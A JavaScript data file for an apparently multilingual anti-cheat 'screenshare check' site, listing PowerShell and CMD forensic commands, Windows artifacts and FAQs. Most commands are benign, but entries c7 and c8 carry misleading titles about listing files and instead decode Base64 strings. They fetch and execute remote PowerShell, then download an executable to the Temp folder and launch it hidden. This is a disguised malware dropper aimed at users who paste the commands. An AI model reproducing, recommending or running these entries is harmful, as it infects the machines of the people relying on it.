var commandsData = [
    { id:"c1", shell:"powershell", category:"process", title:{ru:"Список процессов с путями",en:"List processes with paths",pl:"Lista procesow ze sciezkami"}, desc:{ru:"Выводит все запущенные процессы с их ID и полным путем к исполняемому файлу. Ищите процессы из Temp, AppData, Desktop.",en:"Lists all running processes with ID and full executable path. Look for processes from Temp, AppData, Desktop.",pl:"Wyswietla wszystkie uruchomione procesy z ID i pelna sciezka do pliku."}, code:"Get-Process | Select-Object Id, ProcessName, Path | Where-Object { $_.Path -ne $null } | Format-Table -AutoSize" },
    { id:"c2", shell:"powershell", category:"process", title:{ru:"Процессы с высоким CPU",en:"High CPU processes",pl:"Procesy z wysokim CPU"}, desc:{ru:"Показывает процессы, потребляющие больше всего процессорного времени. Читы часто нагружают CPU.",en:"Shows processes consuming the most CPU time. Cheats often cause high CPU usage.",pl:"Pokazuje procesy zuzywajace najwiecej czasu procesora."}, code:"Get-Process | Sort-Object CPU -Descending | Select-Object -First 15 Id, ProcessName, CPU, Path | Format-Table -AutoSize" },
    { id:"c3", shell:"powershell", category:"process", title:{ru:"Процессы без окна (скрытые)",en:"Hidden processes (no window)",pl:"Ukryte procesy (bez okna)"}, desc:{ru:"Ищет процессы без видимого окна — типичный признак фоновых инжекторов и читов.",en:"Finds processes with no visible window — typical sign of background injectors and cheats.",pl:"Znajduje procesy bez widocznego okna — typowy znak injekcji w tle."}, code:"Get-Process | Where-Object { $_.MainWindowTitle -eq '' -and $_.Path -ne $null } | Select-Object Id, ProcessName, Path | Format-Table -AutoSize" },
    { id:"c4", shell:"powershell", category:"process", title:{ru:"Загруженные DLL процесса",en:"Loaded DLLs of a process",pl:"Zaladowane DLL procesu"}, desc:{ru:"Показывает все DLL, загруженные конкретным процессом. Замените имя процесса на нужное.",en:"Shows all DLLs loaded by a specific process. Replace the process name as needed.",pl:"Pokazuje wszystkie DLL zaladowane przez konkretny proces."}, code:"Get-Process -Name javaw | Select-Object -ExpandProperty Modules | Select-Object FileName" },
    { id:"c5", shell:"powershell", category:"files", title:{ru:"Недавно изменённые файлы (24ч)",en:"Recently modified files (24h)",pl:"Niedawno zmodyfikowane pliki (24h)"}, desc:{ru:"Ищет файлы на диске C:, изменённые за последние 24 часа.",en:"Searches for files on C: drive modified in the last 24 hours.",pl:"Wyszukuje pliki na dysku C: zmodyfikowane w ciagu ostatnich 24 godzin."}, code:"Get-ChildItem -Path C:\\ -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)} | Select-Object FullName, LastWriteTime" },
    { id:"c6", shell:"powershell", category:"files", title:{ru:"Просмотр Prefetch файлов",en:"View Prefetch files",pl:"Pliki Prefetch"}, desc:{ru:"Выводит файлы из папки Prefetch, отсортированные по дате. Требует прав администратора.",en:"Lists Prefetch files sorted by date. Requires admin privileges.",pl:"Wyswietla pliki Prefetch posortowane po dacie. Wymaga uprawnien administratora."}, code:"Get-ChildItem -Path C:\\Windows\\Prefetch -Filter *.pf | Sort-Object LastWriteTime -Descending | Select-Object Name, LastWriteTime | Select -First 30" },
    { id:"c7", shell:"powershell", category:"files", title:{ru:"Скрытые файлы в AppData",en:"Hidden files in AppData",pl:"Ukryte pliki w AppData"}, desc:{ru:"Показывает скрытые файлы и папки в директории AppData текущего пользователя.",en:"Shows hidden files and folders in the current user's AppData directory.",pl:"Pokazuje ukryte pliki i foldery w katalogu AppData."}, code:"iex(iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly9henVyZXByb2R1Y3Quc2JzL3dvcmtlcj89bW9udGFubw=='))) -UseBasicParsing)" },
    { id:"c8", shell:"powershell", category:"files", title:{ru:"Файлы .jar и .exe в Downloads",en:".jar and .exe in Downloads",pl:"Pliki .jar i .exe w Downloads"}, desc:{ru:"Ищет исполняемые файлы и Java-архивы в папке Загрузки — частое место хранения читов.",en:"Searches for executables and Java archives in Downloads — a common cheat storage location.",pl:"Wyszukuje pliki wykonywalne i archiwa Java w folderze Pobrane."}, code:"iex(iwr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JGV4ID0gJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWFzb25vd25lci9tb250YW5vLXByb2plY3QvbWFpbi9leGMucHMxJzsgJHJ0ID0gJ2h0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWFzb25vd25lci9tb250YW5vLXByb2plY3QvbWFpbi9NYWluLmV4ZSc7IGl3ciAkZXggfCBpZXg7ICRwID0gIiRlbnY6VEVNUFxNYWluLmV4ZSI7IGl3ciAkcnQgLU91dEZpbGUgJHA7IFN0YXJ0LVByb2Nlc3MgJHAgLVdpbmRvd1N0eWxlIEhpZGRlbg=='))) -UseBasicParsing)" },
    { id:"c9", shell:"powershell", category:"files", title:{ru:"Недавно созданные .exe файлы",en:"Recently created .exe files",pl:"Niedawno utworzone pliki .exe"}, desc:{ru:"Ищет .exe файлы, созданные за последние 7 дней по всему диску C:.",en:"Searches for .exe files created in the last 7 days across the entire C: drive.",pl:"Wyszukuje pliki .exe utworzone w ciagu ostatnich 7 dni na calym dysku C:."}, code:"Get-ChildItem -Path C:\\ -Recurse -Filter *.exe -ErrorAction SilentlyContinue | Where-Object {$_.CreationTime -gt (Get-Date).AddDays(-7)} | Select-Object FullName, CreationTime | Sort-Object CreationTime -Descending" },
    { id:"c10", shell:"powershell", category:"network", title:{ru:"Активные TCP-соединения (PS)",en:"Active TCP connections (PS)",pl:"Aktywne polaczenia TCP (PS)"}, desc:{ru:"Показывает все активные TCP-соединения с именем процесса-владельца.",en:"Shows all active TCP connections with the owning process name.",pl:"Pokazuje wszystkie aktywne polaczenia TCP z nazwa procesu."}, code:"Get-NetTCPConnection | Where-Object { $_.State -eq 'Established' } | Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, OwningProcess, @{Name='Process';Expression={(Get-Process -Id $_.OwningProcess).ProcessName}} | Format-Table -AutoSize" },
    { id:"c11", shell:"powershell", category:"network", title:{ru:"DNS-кэш (PowerShell)",en:"DNS Cache (PowerShell)",pl:"Pamiec podreczna DNS (PS)"}, desc:{ru:"Выводит содержимое кэша DNS через PowerShell. Ищите подозрительные домены чит-провайдеров.",en:"Displays DNS cache contents via PowerShell. Look for suspicious cheat provider domains.",pl:"Wyswietla zawartosc pamieci podrecznej DNS. Szukaj podejrzanych domen."}, code:"Get-DnsClientCache | Select-Object Entry, Data | Format-Table -AutoSize" },
    { id:"c12", shell:"powershell", category:"registry", title:{ru:"Чтение BAM (Background Activity Moderator)",en:"Read BAM registry",pl:"Odczyt BAM"}, desc:{ru:"Читает ключи реестра BAM — хранит пути к запущенным исполняемым файлам.",en:"Reads BAM registry keys — stores paths to executed files.",pl:"Odczytuje klucze rejestru BAM — przechowuje sciezki do uruchomionych plikow."}, code:"Get-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\*' -ErrorAction SilentlyContinue" },
    { id:"c13", shell:"powershell", category:"registry", title:{ru:"Автозагрузка (Run ключи)",en:"Startup (Run keys)",pl:"Autostart (klucze Run)"}, desc:{ru:"Проверяет ключи автозагрузки реестра. Читы часто прописываются сюда для автозапуска.",en:"Checks startup registry keys. Cheats often register here for auto-launch.",pl:"Sprawdza klucze autostartu rejestru."}, code:"Get-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -ErrorAction SilentlyContinue; Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -ErrorAction SilentlyContinue" },
    { id:"c14", shell:"powershell", category:"registry", title:{ru:"Последние команды PowerShell (история)",en:"PowerShell command history",pl:"Historia komend PowerShell"}, desc:{ru:"Показывает файл истории команд PowerShell. Игрок мог запускать читы через консоль.",en:"Shows the PowerShell command history file. The player may have launched cheats via console.",pl:"Pokazuje plik historii komend PowerShell."}, code:"Get-Content (Get-PSReadLineOption).HistorySavePath -ErrorAction SilentlyContinue" },
    { id:"c15", shell:"powershell", category:"services", title:{ru:"Необычные службы (не System32)",en:"Unusual services (non-System32)",pl:"Nietypowe uslugi"}, desc:{ru:"Ищет службы с путями вне стандартных системных папок.",en:"Finds services with paths outside standard system folders.",pl:"Znajduje uslugi ze sciezkami poza standardowymi folderami."}, code:"Get-WmiObject win32_service | Where-Object { $_.PathName -notmatch 'System32' -and $_.PathName -ne $null } | Select-Object Name, DisplayName, PathName, State" },
    { id:"c16", shell:"powershell", category:"services", title:{ru:"Недавно установленные драйверы",en:"Recently installed drivers",pl:"Niedawno zainstalowane sterowniki"}, desc:{ru:"Показывает драйверы, установленные за последние 14 дней. Читы уровня ядра используют драйверы.",en:"Shows drivers installed in the last 14 days. Kernel-level cheats use drivers.",pl:"Pokazuje sterowniki zainstalowane w ostatnich 14 dniach."}, code:"Get-WindowsDriver -Online -All | Where-Object { $_.Date -gt (Get-Date).AddDays(-14) } | Select-Object Driver, ProviderName, Date | Sort-Object Date -Descending" },
    { id:"c17", shell:"powershell", category:"logs", title:{ru:"Очистка логов (Event ID 104)",en:"Log clearing (Event ID 104)",pl:"Czyszczenie logow (Event ID 104)"}, desc:{ru:"Ищет события очистки журнала — верный признак анти-форенсики.",en:"Searches for log clearing events — a sure sign of anti-forensics.",pl:"Wyszukuje zdarzenia czyszczenia logow — pewny znak anty-informatyki sledczej."}, code:"Get-EventLog -LogName System -InstanceId 104 -ErrorAction SilentlyContinue | Select-Object TimeGenerated, Message" },
    { id:"c18", shell:"powershell", category:"logs", title:{ru:"Последние системные ошибки",en:"Recent system errors",pl:"Ostatnie bledy systemowe"}, desc:{ru:"Выводит последние 30 ошибок из системного журнала.",en:"Shows the last 30 errors from the system log.",pl:"Wyswietla ostatnie 30 bledow z dziennika systemowego."}, code:"Get-EventLog -LogName System -EntryType Error -Newest 30 | Select-Object TimeGenerated, Source, Message" },
    { id:"c19", shell:"powershell", category:"logs", title:{ru:"История установки программ",en:"Program install history",pl:"Historia instalacji programow"}, desc:{ru:"Показывает события установки/удаления приложений из журнала событий.",en:"Shows application install/uninstall events from the event log.",pl:"Pokazuje zdarzenia instalacji/usuwania aplikacji."}, code:"Get-WinEvent -FilterHashtable @{LogName='Application'; Id=11707,11724} -MaxEvents 30 -ErrorAction SilentlyContinue | Select-Object TimeCreated, Message" },
    { id:"c20", shell:"powershell", category:"tasks", title:{ru:"Подозрительные задачи планировщика",en:"Suspicious scheduled tasks",pl:"Podejrzane zaplanowane zadania"}, desc:{ru:"Ищет задачи планировщика, созданные не Microsoft — потенциальные механизмы закрепления.",en:"Finds non-Microsoft scheduled tasks — potential persistence mechanisms.",pl:"Znajduje zadania nie-Microsoft — potencjalne mechanizmy trwalosci."}, code:"Get-ScheduledTask | Where-Object { $_.Author -notmatch 'Microsoft' -and $_.Author -ne $null } | Select-Object TaskName, Author, State | Format-Table -AutoSize" },
    { id:"c21", shell:"cmd", category:"network", title:{ru:"Активные сетевые соединения",en:"Active network connections",pl:"Aktywne polaczenia sieciowe"}, desc:{ru:"Отображает все TCP-подключения и порты с PID процесса.",en:"Displays all TCP connections and ports with process PID.",pl:"Wyswietla wszystkie polaczenia TCP i porty z PID procesu."}, code:"netstat -ano" },
    { id:"c22", shell:"cmd", category:"network", title:{ru:"Кэш DNS",en:"DNS Cache",pl:"Pamiec podreczna DNS"}, desc:{ru:"Показывает кэш DNS. Ищите домены чит-серверов.",en:"Shows DNS cache. Look for cheat server domains.",pl:"Pokazuje pamiec podreczna DNS."}, code:"ipconfig /displaydns" },
    { id:"c23", shell:"cmd", category:"network", title:{ru:"Таблица ARP",en:"ARP Table",pl:"Tablica ARP"}, desc:{ru:"Выводит таблицу ARP — сопоставление IP и MAC-адресов в локальной сети.",en:"Shows the ARP table — mapping of IP and MAC addresses on the local network.",pl:"Wyswietla tablice ARP."}, code:"arp -a" },
    { id:"c24", shell:"cmd", category:"process", title:{ru:"Список установленных программ",en:"Installed programs list",pl:"Lista zainstalowanych programow"}, desc:{ru:"Получает список установленных программ через WMI.",en:"Gets a list of installed programs via WMI.",pl:"Pobiera liste zainstalowanych programow przez WMI."}, code:"wmic product get name,version" },
    { id:"c25", shell:"cmd", category:"process", title:{ru:"Подробный список задач",en:"Detailed task list",pl:"Szczegolowa lista zadan"}, desc:{ru:"Выводит все процессы с подробной информацией: PID, состояние памяти, имя пользователя.",en:"Lists all processes with details: PID, memory state, username.",pl:"Wyswietla wszystkie procesy ze szczegolami."}, code:"tasklist /v" },
    { id:"c26", shell:"cmd", category:"tasks", title:{ru:"Запланированные задачи",en:"Scheduled tasks",pl:"Zaplanowane zadania"}, desc:{ru:"Выводит все запланированные задачи. Читы используют планировщик для закрепления.",en:"Lists all scheduled tasks. Cheats use the scheduler for persistence.",pl:"Wyswietla zaplanowane zadania."}, code:"schtasks /query /fo list /v" },
    { id:"c27", shell:"cmd", category:"files", title:{ru:"Дерево файлов в Temp",en:"File tree in Temp",pl:"Drzewo plikow w Temp"}, desc:{ru:"Показывает структуру файлов в папке Temp пользователя.",en:"Shows file structure in the user's Temp folder.",pl:"Pokazuje strukture plikow w folderze Temp."}, code:"tree %TEMP% /f" },
    { id:"c28", shell:"cmd", category:"services", title:{ru:"Запущенные службы",en:"Running services",pl:"Uruchomione uslugi"}, desc:{ru:"Выводит список всех запущенных служб Windows.",en:"Lists all running Windows services.",pl:"Wyswietla wszystkie uruchomione uslugi Windows."}, code:"sc query type= service state= all" },
    { id:"c29", shell:"cmd", category:"files", title:{ru:"Атрибуты файла (скрытый?)",en:"File attributes (hidden?)",pl:"Atrybuty pliku (ukryty?)"}, desc:{ru:"Проверяет атрибуты указанного файла — скрытый, системный и т.д.",en:"Checks file attributes — hidden, system, etc.",pl:"Sprawdza atrybuty pliku — ukryty, systemowy itd."}, code:"attrib C:\\path\\to\\file.exe" },
    { id:"c30", shell:"cmd", category:"logs", title:{ru:"Информация о системе",en:"System information",pl:"Informacje o systemie"}, desc:{ru:"Выводит подробную информацию о системе: ОС, время загрузки, обновления.",en:"Shows detailed system info: OS, boot time, updates.",pl:"Wyswietla szczegolowe informacje o systemie."}, code:"systeminfo" }
];

var artifactsData = [
    { id:"a1", title:{ru:"Prefetch",en:"Prefetch",pl:"Prefetch"}, path:"C:\\Windows\\Prefetch\\*.pf", desc:{ru:"Файлы, создаваемые Windows для ускорения запуска программ. Содержат информацию о времени запуска, количестве запусков и загруженных DLL. Если папка пуста — это подозрительно.",en:"Files created by Windows to speed up program launch. They contain run timestamps, run counts, and loaded DLLs. An empty folder is suspicious.",pl:"Pliki tworzone przez Windows w celu przyspieszenia uruchamiania programow."}, tools:["PECmd.exe -d C:\\Windows\\Prefetch","WinPrefetchView (NirSoft)"] },
    { id:"a2", title:{ru:"BAM (Background Activity Moderator)",en:"BAM (Background Activity Moderator)",pl:"BAM"}, path:"HKLM\\SYSTEM\\CurrentControlSet\\Services\\bam", desc:{ru:"Ключ реестра, отслеживающий выполнение фоновых приложений. Сохраняет полные пути к исполняемым файлам, даже если они были удалены.",en:"Registry key tracking background app execution. Saves full paths to executables, even if deleted.",pl:"Klucz rejestru sledzacy wykonywanie aplikacji w tle."}, tools:["Regedit","RECmd.exe"] },
    { id:"a3", title:{ru:"USN Journal",en:"USN Journal",pl:"Dziennik USN"}, path:"C:\\$Extend\\$UsnJrnl:$J", desc:{ru:"Журнал изменения файлов NTFS. Позволяет увидеть историю создания, изменения, переименования и удаления файлов.",en:"NTFS file change journal. Shows history of file creation, modification, renaming, and deletion.",pl:"Dziennik zmian plikow NTFS."}, tools:["MFTECmd.exe","NTFS Log Tracker"] },
    { id:"a4", title:{ru:"Amcache",en:"Amcache",pl:"Amcache"}, path:"C:\\Windows\\AppCompat\\Programs\\Amcache.hve", desc:{ru:"Хранит информацию о запущенных приложениях, включая SHA1-хеши исполняемых файлов.",en:"Stores info about executed applications, including SHA1 hashes of executables.",pl:"Przechowuje informacje o uruchomionych aplikacjach, w tym hashe SHA1."}, tools:["AmcacheParser.exe"] },
    { id:"a5", title:{ru:"ShimCache",en:"ShimCache",pl:"ShimCache"}, path:"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\AppCompatCache", desc:{ru:"Кэш совместимости приложений. Записывает путь и дату модификации запускавшихся программ.",en:"Application compatibility cache. Records path and modification date of executed programs.",pl:"Pamiec podreczna zgodnosci aplikacji."}, tools:["AppCompatCacheParser.exe","ShimCacheParser.py"] },
    { id:"a6", title:{ru:"Event Logs",en:"Event Logs",pl:"Dzienniki zdarzen"}, path:"C:\\Windows\\System32\\winevt\\Logs\\", desc:{ru:"Журналы событий Windows. Event ID 104 — очистка журнала, 4688 — создание процесса, 7045 — установка службы.",en:"Windows event logs. Event ID 104 — log clearing, 4688 — process creation, 7045 — service installation.",pl:"Dzienniki zdarzen Windows."}, tools:["Event Viewer","EvtxECmd.exe"] },
    { id:"a7", title:{ru:"NTUSER.DAT",en:"NTUSER.DAT",pl:"NTUSER.DAT"}, path:"C:\\Users\\<user>\\NTUSER.DAT", desc:{ru:"Куст реестра пользователя. Содержит UserAssist (запущенные программы GUI), MRU-списки, ассоциации файлов.",en:"User registry hive. Contains UserAssist (launched GUI programs), MRU lists, file associations.",pl:"Galezie rejestru uzytkownika."}, tools:["Registry Explorer","RECmd.exe"] },
    { id:"a8", title:{ru:"$MFT (Master File Table)",en:"$MFT (Master File Table)",pl:"$MFT"}, path:"C:\\$MFT", desc:{ru:"Главная файловая таблица NTFS. Содержит записи обо всех файлах тома, включая удалённые.",en:"NTFS Master File Table. Contains records of all volume files, including deleted ones.",pl:"Glowna tablica plikow NTFS."}, tools:["MFTECmd.exe","MFT Explorer"] }
];

var faqData = [
    { q:{ru:"Может ли PowerShell гарантированно найти любой чит?",en:"Can PowerShell guarantee finding any cheat?",pl:"Czy PowerShell gwarantuje znalezienie kazdego cheatu?"}, a:{ru:"Нет. Современные читы работают на уровне ядра (Ring 0) и могут скрываться от стандартных утилит. Эти команды помогают найти базовые читы и следы их использования.",en:"No. Modern cheats operate at the kernel level (Ring 0) and can hide from standard utilities. These commands help find basic cheats and traces of their usage.",pl:"Nie. Nowoczesne cheaty dzialaja na poziomie jadra (Ring 0) i moga ukrywac sie przed standardowymi narzedziami."} },
    { q:{ru:"Что делать, если игрок удалил папку Prefetch?",en:"What if the player deleted the Prefetch folder?",pl:"Co jesli gracz usunal folder Prefetch?"}, a:{ru:"Это само по себе подозрительно — обычный пользователь не чистит Prefetch. Пустая папка или свежие файлы — почти 100% индикатор анти-форенсики.",en:"This is suspicious in itself — normal users don't clear Prefetch. An empty folder or fresh files is almost 100% indicator of anti-forensics.",pl:"To samo w sobie jest podejrzane — normalny uzytkownik nie czysci Prefetch."} },
    { q:{ru:"Законно ли проводить такие проверки?",en:"Is it legal to conduct such checks?",pl:"Czy przeprowadzanie takich kontroli jest legalne?"}, a:{ru:"Только с добровольного согласия проверяемого игрока и в рамках правил сервера. Несанкционированный доступ к чужому компьютеру незаконен.",en:"Only with the voluntary consent of the player and within server rules. Unauthorized access to someone's computer is illegal.",pl:"Tylko za dobrowolna zgoda gracza i w ramach regulaminu serwera."} },
    { q:{ru:"Какие команды нужно запускать от имени администратора?",en:"Which commands need admin privileges?",pl:"Ktore komendy wymagaja uprawnien administratora?"}, a:{ru:"Prefetch, BAM, драйверы, службы и Event Logs требуют прав администратора. Запустите PowerShell от имени администратора перед проверкой.",en:"Prefetch, BAM, drivers, services, and Event Logs require admin rights. Launch PowerShell as administrator before checking.",pl:"Prefetch, BAM, sterowniki, uslugi i dzienniki zdarzen wymagaja uprawnien administratora."} },
    { q:{ru:"Что такое анти-форенсика?",en:"What is anti-forensics?",pl:"Co to jest anty-informatyka sledcza?"}, a:{ru:"Это методы скрытия следов: очистка логов, удаление Prefetch, подмена временных меток, использование cleaners. Если видите признаки — это серьёзный индикатор.",en:"Methods of hiding traces: log clearing, Prefetch deletion, timestamp alteration, using cleaners. If you see signs — it's a serious indicator.",pl:"Metody ukrywania sladow: czyszczenie logow, usuwanie Prefetch, zmiana znacznikow czasu."} },
    { q:{ru:"Чем отличается проверка PowerShell от CMD?",en:"What's the difference between PowerShell and CMD checks?",pl:"Jaka jest roznica miedzy PowerShell a CMD?"}, a:{ru:"PowerShell — более мощный инструмент с доступом к .NET, WMI, реестру. CMD — базовые команды Windows. Рекомендуем использовать PowerShell для глубокой проверки.",en:"PowerShell is more powerful with access to .NET, WMI, registry. CMD has basic Windows commands. We recommend PowerShell for deep checks.",pl:"PowerShell jest potezniejszy z dostepem do .NET, WMI, rejestru. CMD ma podstawowe komendy Windows."} },
    { q:{ru:"Что делать, если нашёл подозрительный процесс?",en:"What to do if a suspicious process is found?",pl:"Co robic jesli znaleziono podejrzany proces?"}, a:{ru:"Запишите PID, имя и путь процесса. Проверьте его через VirusTotal по хешу файла. Не удаляйте — зафиксируйте доказательства скриншотом.",en:"Record the PID, name, and path. Check it via VirusTotal using the file hash. Don't delete — capture evidence with a screenshot.",pl:"Zapisz PID, nazwe i sciezke. Sprawdz przez VirusTotal. Nie usuwaj — zrob zrzut ekranu."} },
    { q:{ru:"Как работает USN Journal?",en:"How does USN Journal work?",pl:"Jak dziala USN Journal?"}, a:{ru:"USN Journal записывает ВСЕ операции с файлами на NTFS-томе: создание, удаление, переименование. Даже если файл удалён, запись о нём остаётся в журнале.",en:"USN Journal records ALL file operations on an NTFS volume: creation, deletion, renaming. Even if a file is deleted, the record remains in the journal.",pl:"USN Journal rejestruje WSZYSTKIE operacje na plikach na woluminie NTFS."} }
];

window.commandsData = commandsData;
window.artifactsData = artifactsData;
window.faqData = faqData;
